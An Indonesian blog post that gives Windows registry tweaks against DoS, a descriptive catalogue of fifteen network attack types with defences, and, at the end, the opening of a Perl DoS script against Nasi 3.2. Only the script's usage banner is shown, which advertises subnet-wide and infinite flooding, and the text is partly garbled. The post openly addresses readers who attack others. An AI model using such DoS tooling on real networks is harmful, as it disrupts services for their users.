Selasa, 25 Januari 2011

encegah komputer anda dari dos atau denial of service

melakukan dos dengan sangat mudah DI WINDOWS . Dan Windows merupakan OS yang paling gampang dan rentan dari serangan ini. Pada treath ini, /me ingin memberikan cara untuk memprotek komputer anda dari serangan dos atau denial of service attack. Gak lucu kan abis nyerang orang, kompi anda diserang balik, eh jebol juga

here we go !!!!!!


kita masuk pada point inti.. buka regedit. Dan ikuti langkah - langkah berikut ini:

Pertama:

1. HKEY_LOCAL_MACHINE
2. SOFTWARE
3. Microsoft
4. UPnP Device Host atau UPnP Control Point
5. Pada sisi sebelah kanan, klik kanan New - DWORD Value berikan nama DownloadScope dan beri nilai 3.




Kedua:

Ikuti cara pertama, dan Masuk ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SSDPSRV\Parameters and klik new - dword dan beri nama TTL lalu beri dengan nilai 30. Tutup regedit anda, dan restart komputer.


mudah khan broe

15 Jenis Serangan Cracker

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga
sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar
network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan
serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari
Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’
packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk
routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah
untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker
tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet
Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi
dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan
pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi
Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.
Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikan
dan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak
mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source
yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain,
Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya
sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.
Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak
packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan
setiap serangan spoofing.

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang
diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk
mendapatkan command shell ataupun untuk melakukan Denial Of Service.
Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil
resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang
attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa
membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang
diserang.
Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering
dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki.
Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di
upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow
Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce
attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff
informasi yang berada dalam sistem

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi
diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan
peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang
sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk
melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga
menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada
dalam sistem dan seberapa jauh user merawat sistem.
Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah
sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi
seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk
memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara
significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa
menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan
dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua
station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini
adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya
menyerah.
Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or
volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas
besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu
network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup
power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas
proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar
akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang
digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of
Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles
ketika serangan ini dijalakan melewati UDP.
Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers,
tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap
network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di
amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti
satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang
pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan
jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.
TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk
menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service).
Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang
dengan cara ini.
Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk
menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS
akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara
berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara
mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan
oleh system yang sudah terkena serangan sangat parah).

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya
mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa
firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi
alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash.
Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk
menulis ulang informasi paket pertama dari suatu protokol.
Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang
dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan
menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika
terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali.

Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak
pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content –
based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk
perusakan dan pembobolan.
Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali
menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network
tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters)
yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara
ini.


6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command
manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode
(malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email
bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file
aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker
kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi
antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding
merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi
down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi
fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi
email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang
berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set
untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate
lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.
Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system
menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang
diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood
dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu
memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin
tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command
yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk
memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.
Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-
an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker
dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload
lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian
ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell
dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga
sering terjadi pada POP dan IMAP.
Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan
tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood.
Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang
attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong
lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu
organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan
sumber dan alamat dari organisasi tersebut.
Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan
dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat
broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail
dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan
disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai
Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke
users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap
attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.
Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara
melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat
admin agar users mengirimkan passwordnya untuk mengupgrade system.

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa
kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).
Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang
berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet
Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak
ada hal mudah lainnya yang menyangkut internet.
Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address
translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat
informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking.
Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari
jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning,
yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain
dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi.
Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil
dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).
DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang
dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya
menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive
name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area,
maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.
Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya
kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk
memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi
telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan
compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini
stidaknya membuat cracker akan sulit menggunakan exploit.
Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang
harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan
patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara
berkala, tentunya untuk menjaga kemanan system.
Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode
mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka
file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin.
Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti
server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache
poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain
hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network
infrastucture sebelum mengganti server yang lama.

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.
Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara
manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang
umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang
aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7
karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat
mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit
angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi
mudah andai saja mereka lupa untuk merubah password default dari sebuah software.
Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan
waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login
dengan menebak password berkali-kali.
Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi
serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker
menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password
umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat
penemuan password sebelum network admin menyadari adanya serangan.
Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada
dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh
lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan
mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak
tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan
password).
Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang
system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk
network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang
salah berulangkali dan akhirnya mengunci account admin ?. Ketika sang admin sedang berusaha untuk
mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system.
Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di
dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah
kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-force
dictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi
dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah
dengan memonitor kewenangan akses pada file.
Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat
mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang
dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut
tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada
HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau
juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk
memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bisa
menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika
attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan
DDOS(distributed denial of service) secara anoymous untuk menyerang network lain.
Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan
mengakibatkan kerawanan yang sama dengan proxy server.

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.
Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang
network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau
banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan
dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX,
informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data
ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.
Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya
memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049
seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix)
seharusnya di catat dalam log.

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.
Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program
seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat
menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware
dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai
berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan
mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut
sandboxes.

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet
milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut
saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali
algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bisa
digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya
memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP
Spoofing.
Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file
yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan.
Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di
system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik
yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya
dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak
dikembalikan.
Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi
bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker
mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System
sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke
server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa
dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk
mendeface website.
Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion.
Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang
tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan
perintah secara remote (remote command priviledges).
Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies
antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll.
Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti
nomor credit card dan password.
Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan
cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to
live).
Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada
kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website.
Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection
system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan
untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi
sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek
security pada system sendiri dan metode lain.
Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall
firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari
serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...

DDos NetWorking [LAN]

#!/usr/bin/perl

use IO::Socket;

if (@ARGV < 1)
{
print â€Å“\n”;
print ” \/[DoS for All Nassi <= 3.2 build 2260]===[v0.1]=====\\\n”;
print ” \| ___ ___ ___ ___ ___ \|\n”;
print ” \| N /s/ T N /s/ T N /s/ T N /s/ T N /s/ T \|\n”;
print ” \| — — — — — \|\n”;
print ” \| \|\n”;
print ” \| Tested on: Nasi 3.2 build 2260 www.gracebyte.com \|\n”;
print ” \| \|\n”;
print ” \| Usage: nasidos.pl [port] [-i] \|\n”;
print ” \| \|\n”;
print ” \| Example: nasidos.pl 127.0.0.1 \|\n”;
print ” \| nasidos.pl 127.0.0.1 12345 \|\n”;
print ” \| nasidos.pl 192.168.102.* \|\n”;
print ” \| nasidos.pl 192.168.102.1 -i \|\n”;
print ” \| \|\n”;
print ” \| Keys: -i - Infinite DoS. Use ctrl+c for stop it. \|\n”;
print ” \| * - All in subnet. \|\n”;
print ” \| \|\n”;
print ” \| Info: If still don’t work try to scan victem on \|\n”;
print ” \| open UDP ports. Maby use not default port \|\n”;
print ” \| for Nasi. \|\n”;
print ” \\================================================ ==\/\n”;
exit(0);
}

